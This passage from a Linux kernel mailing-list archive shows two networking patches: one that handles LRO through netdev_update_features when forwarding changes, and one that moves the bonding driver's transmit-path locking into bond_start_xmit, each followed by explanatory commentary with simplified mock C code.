 	in_dev->arp_parms = neigh_parms_alloc(dev, &arp_tbl);
 	if (!in_dev->arp_parms)
 		goto out_kfree;
-	if (IPV4_DEVCONF(in_dev->cnf, FORWARDING))
-		dev_disable_lro(dev);
 	/* Reference in_dev->dev */
 	dev_hold(dev);
 	/* Account for reference dev->ip_ptr (below) */
@@ -259,6 +257,8 @@ static struct in_device *inetdev_init(struct net_device *dev)
 
 	/* we can receive as soon as ip_ptr is set -- do this last */
 	rcu_assign_pointer(dev->ip_ptr, in_dev);
+
+	netdev_update_features(dev);
 out:
 	return in_dev;
 out_kfree:
@@ -1475,14 +1475,12 @@ static void inet_forward_change(struct net *net)
 	IPV4_DEVCONF_DFLT(net, FORWARDING) = on;
 
 	for_each_netdev(net, dev) {
-		struct in_device *in_dev;
-		if (on)
-			dev_disable_lro(dev);
-		rcu_read_lock();
-		in_dev = __in_dev_get_rcu(dev);
-		if (in_dev)
+		struct in_device *in_dev = __in_dev_get_rtnl(dev);
+
+		if (in_dev) {
 			IN_DEV_CONF_SET(in_dev, FORWARDING, on);
-		rcu_read_unlock();
+			netdev_update_features(in_dev->dev);
+		}
 	}
 }
 
@@ -1527,11 +1525,11 @@ static int devinet_sysctl_forward(ctl_table *ctl, int write,
 			}
 			if (valp == &IPV4_DEVCONF_ALL(net, FORWARDING)) {
 				inet_forward_change(net);
-			} else if (*valp) {
+			} else {
 				struct ipv4_devconf *cnf = ctl->extra1;
 				struct in_device *idev =
 					container_of(cnf, struct in_device, cnf);
-				dev_disable_lro(idev->dev);
+				netdev_update_features(idev->dev);
 			}
 			rtnl_unlock();
 			rt_cache_flush(net, 0);
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index f2f9b2e..d1344ac 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -370,8 +370,6 @@ static struct inet6_dev * ipv6_add_dev(struct net_device *dev)
 		kfree(ndev);
 		return NULL;
 	}
-	if (ndev->cnf.forwarding)
-		dev_disable_lro(dev);
 	/* We refer to the device */
 	dev_hold(dev);
 
@@ -435,6 +433,7 @@ static struct inet6_dev * ipv6_add_dev(struct net_device *dev)
 	addrconf_sysctl_register(ndev);
 	/* protected by rtnl_lock */
 	rcu_assign_pointer(dev->ip6_ptr, ndev);
+	netdev_update_features(dev);
 
 	/* Join all-node multicast group */
 	ipv6_dev_mc_inc(dev, &in6addr_linklocal_allnodes);
@@ -469,8 +468,6 @@ static void dev_forward_change(struct inet6_dev *idev)
 	if (!idev)
 		return;
 	dev = idev->dev;
-	if (idev->cnf.forwarding)
-		dev_disable_lro(dev);
 	if (dev && (dev->flags & IFF_MULTICAST)) {
 		if (idev->cnf.forwarding)
 			ipv6_dev_mc_inc(dev, &in6addr_linklocal_allrouters);
@@ -486,6 +483,8 @@ static void dev_forward_change(struct inet6_dev *idev)
 		else
 			addrconf_leave_anycast(ifa);
 	}
+
+	netdev_update_features(dev);
 }
 
 
-- 
1.7.2.5
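
The behaviour described in the commit message (LRO is stripped whenever
the device is a bridge port or forwards IPv4/IPv6, and comes back once it
stops forwarding) can be sketched as a pure function over the feature
mask. The names below (MOCK_F_LRO, MOCK_F_SG, struct mock_fwd_state,
mock_fix_lro) and the bit values are assumptions made for illustration;
they are not the kernel's definitions. Note that clearing a bit needs the
complement mask, i.e. "features &= ~BIT".

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical feature bits; the real NETIF_F_* values differ. */
#define MOCK_F_LRO 0x1u
#define MOCK_F_SG  0x2u

/* Hypothetical summary of the three conditions the patch checks. */
struct mock_fwd_state {
	bool bridge_port;     /* dev->priv_flags & IFF_BRIDGE_PORT */
	bool ipv4_forwarding; /* per-device IPv4 FORWARDING setting */
	bool ipv6_forwarding; /* per-device IPv6 forwarding setting */
};

/*
 * Returns the feature mask with LRO removed if the device may forward
 * received packets. All other bits pass through unchanged.
 */
static uint32_t mock_fix_lro(const struct mock_fwd_state *st,
			     uint32_t features)
{
	assert(st != NULL);

	if ((features & MOCK_F_LRO) &&
	    (st->bridge_port || st->ipv4_forwarding || st->ipv6_forwarding))
		features &= ~MOCK_F_LRO;

	return features;
}
```

Because the function is recomputed from the current state each time, a
device that leaves forwarding mode gets LRO back on the next update,
which is the side effect the commit message mentions.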



* [PATCH] net: bonding: factor out rlock(bond->lock) in xmit path
From: Michał Mirosław @ 2011-05-07 11:48 UTC (permalink / raw)
  To: netdev; +Cc: Jay Vosburgh, Andy Gospodarek

Pull read_lock(&bond->lock) and the BOND_IS_OK() check out of the
mode-dependent xmit functions and into bond_start_xmit().

netif_running() is always true in hard_start_xmit, so only the slave
count needs to be checked.

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---
 drivers/net/bonding/bond_3ad.c  |   10 +-----
 drivers/net/bonding/bond_alb.c  |   11 +-----
 drivers/net/bonding/bond_main.c |   74 +++++++++++++++++----------------------
 3 files changed, 35 insertions(+), 60 deletions(-)

diff --git a/drivers/net/bonding/bond_3ad.c b/drivers/net/bonding/bond_3ad.c
index d4160f8..c7537abc 100644
--- a/drivers/net/bonding/bond_3ad.c
+++ b/drivers/net/bonding/bond_3ad.c
@@ -2403,14 +2403,6 @@ int bond_3ad_xmit_xor(struct sk_buff *skb, struct net_device *dev)
 	struct ad_info ad_info;
 	int res = 1;
 
-	/* make sure that the slaves list will
-	 * not change during tx
-	 */
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
-
 	if (bond_3ad_get_active_agg_info(bond, &ad_info)) {
 		pr_debug("%s: Error: bond_3ad_get_active_agg_info failed\n",
 			 dev->name);
@@ -2464,7 +2456,7 @@ out:
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
diff --git a/drivers/net/bonding/bond_alb.c b/drivers/net/bonding/bond_alb.c
index 3b7b040..8f2d2e7 100644
--- a/drivers/net/bonding/bond_alb.c
+++ b/drivers/net/bonding/bond_alb.c
@@ -1225,16 +1225,10 @@ int bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev)
 	skb_reset_mac_header(skb);
 	eth_data = eth_hdr(skb);
 
-	/* make sure that the curr_active_slave and the slaves list do
-	 * not change during tx
+	/* make sure that the curr_active_slave does not change during tx
 	 */
-	read_lock(&bond->lock);
 	read_lock(&bond->curr_slave_lock);
 
-	if (!BOND_IS_OK(bond)) {
-		goto out;
-	}
-
 	switch (ntohs(skb->protocol)) {
 	case ETH_P_IP: {
 		const struct iphdr *iph = ip_hdr(skb);
@@ -1334,13 +1328,12 @@ int bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev)
 		}
 	}
 
-out:
 	if (res) {
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
 	read_unlock(&bond->curr_slave_lock);
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index 04a2205..1f8902e 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -3975,10 +3975,6 @@ static int bond_xmit_roundrobin(struct sk_buff *skb, struct net_device *bond_dev
 	int i, slave_no, res = 1;
 	struct iphdr *iph = ip_hdr(skb);
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
 	/*
 	 * Start with the curr_active_slave that joined the bond as the
 	 * default for sending IGMP traffic.  For failover purposes one
@@ -4025,7 +4021,7 @@ out:
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
@@ -4039,24 +4035,18 @@ static int bond_xmit_activebackup(struct sk_buff *skb, struct net_device *bond_d
 	struct bonding *bond = netdev_priv(bond_dev);
 	int res = 1;
 
-	read_lock(&bond->lock);
 	read_lock(&bond->curr_slave_lock);
 
-	if (!BOND_IS_OK(bond))
-		goto out;
+	if (bond->curr_active_slave)
+		res = bond_dev_queue_xmit(bond, skb,
+			bond->curr_active_slave->dev);
 
-	if (!bond->curr_active_slave)
-		goto out;
-
-	res = bond_dev_queue_xmit(bond, skb, bond->curr_active_slave->dev);
-
-out:
 	if (res)
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 
 	read_unlock(&bond->curr_slave_lock);
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
@@ -4073,11 +4063,6 @@ static int bond_xmit_xor(struct sk_buff *skb, struct net_device *bond_dev)
 	int i;
 	int res = 1;
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
-
 	slave_no = bond->xmit_hash_policy(skb, bond->slave_cnt);
 
 	bond_for_each_slave(bond, slave, i) {
@@ -4097,12 +4082,11 @@ static int bond_xmit_xor(struct sk_buff *skb, struct net_device *bond_dev)
 		}
 	}
 
-out:
 	if (res) {
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
@@ -4117,11 +4101,6 @@ static int bond_xmit_broadcast(struct sk_buff *skb, struct net_device *bond_dev)
 	int i;
 	int res = 1;
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
-
 	read_lock(&bond->curr_slave_lock);
 	start_at = bond->curr_active_slave;
 	read_unlock(&bond->curr_slave_lock);
@@ -4160,7 +4139,6 @@ out:
 		dev_kfree_skb(skb);
 
 	/* frame sent to all suitable interfaces */
-	read_unlock(&bond->lock);
 	return NETDEV_TX_OK;
 }
 
@@ -4192,10 +4170,8 @@ static inline int bond_slave_override(struct bonding *bond,
 	struct slave *slave = NULL;
 	struct slave *check_slave;
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond) || !skb->queue_mapping)
-		goto out;
+	if (!skb->queue_mapping)
+		return 1;
 
 	/* Find out if any slaves have the same mapping as this skb. */
 	bond_for_each_slave(bond, check_slave, i) {
@@ -4211,8 +4187,6 @@ static inline int bond_slave_override(struct bonding *bond,
 		res = bond_dev_queue_xmit(bond, skb, slave->dev);
 	}
 
-out:
-	read_unlock(&bond->lock);
 	return res;
 }
 
@@ -4234,17 +4208,10 @@ static u16 bond_select_queue(struct net_device *dev, struct sk_buff *skb)
 	return txq;
 }
 
-static netdev_tx_t bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
+static netdev_tx_t __bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
 {
 	struct bonding *bond = netdev_priv(dev);
 
-	/*
-	 * If we risk deadlock from transmitting this in the
-	 * netpoll path, tell netpoll to queue the frame for later tx
-	 */
-	if (is_netpoll_tx_blocked(dev))
-		return NETDEV_TX_BUSY;
-
 	if (TX_QUEUE_OVERRIDE(bond->params.mode)) {
 		if (!bond_slave_override(bond, skb))
 			return NETDEV_TX_OK;
@@ -4274,6 +4241,29 @@ static netdev_tx_t bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
 	}
 }
 
+static netdev_tx_t bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
+{
+	struct bonding *bond = netdev_priv(dev);
+	netdev_tx_t ret = NETDEV_TX_OK;
+
+	/*
+	 * If we risk deadlock from transmitting this in the
+	 * netpoll path, tell netpoll to queue the frame for later tx
+	 */
+	if (is_netpoll_tx_blocked(dev))
+		return NETDEV_TX_BUSY;
+
+	read_lock(&bond->lock);
+
+	if (bond->slave_cnt)
+		ret = __bond_start_xmit(skb, dev);
+	else
+		dev_kfree_skb(skb);
+
+	read_unlock(&bond->lock);
+
+	return ret;
+}
 
 /*
  * set bond mode specific net device operations
-- 
1.7.2.5
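
The refactoring pattern in this patch (take the lock and do the sanity
check once in a wrapper, then dispatch to a mode-specific handler that
assumes the lock is held) can be sketched in userspace as follows. This
is a rough model only: struct mock_bond, its lock_depth counter and the
mock_* functions are hypothetical and merely stand in for struct bonding,
read_lock(&bond->lock) and the per-mode xmit functions.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for the parts of struct bonding used here. */
struct mock_bond {
	int slave_cnt;  /* number of enslaved devices */
	int lock_depth; /* models read_lock()/read_unlock() on bond->lock */
	int sent;       /* frames handed to a mode handler */
	int dropped;    /* frames freed because no slave exists */
};

typedef int (*mock_xmit_fn)(struct mock_bond *bond);

/* A mode-specific handler: it relies on the caller holding the lock. */
static int mock_mode_xmit(struct mock_bond *bond)
{
	assert(bond->lock_depth == 1);
	bond->sent++;
	return 0;
}

/* The wrapper: lock once, check once, dispatch, unlock. */
static int mock_start_xmit(struct mock_bond *bond, mock_xmit_fn mode_xmit)
{
	int ret = 0;

	assert(bond != NULL && mode_xmit != NULL);

	bond->lock_depth++;            /* read_lock(&bond->lock) */
	if (bond->slave_cnt)
		ret = mode_xmit(bond);
	else
		bond->dropped++;       /* dev_kfree_skb(skb) */
	bond->lock_depth--;            /* read_unlock(&bond->lock) */

	return ret;
}
```

Keeping the lock in one place means every mode handler loses its own
lock/unlock pair and its "goto out" path, which is where most of the
deleted lines in the diffstat come from.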


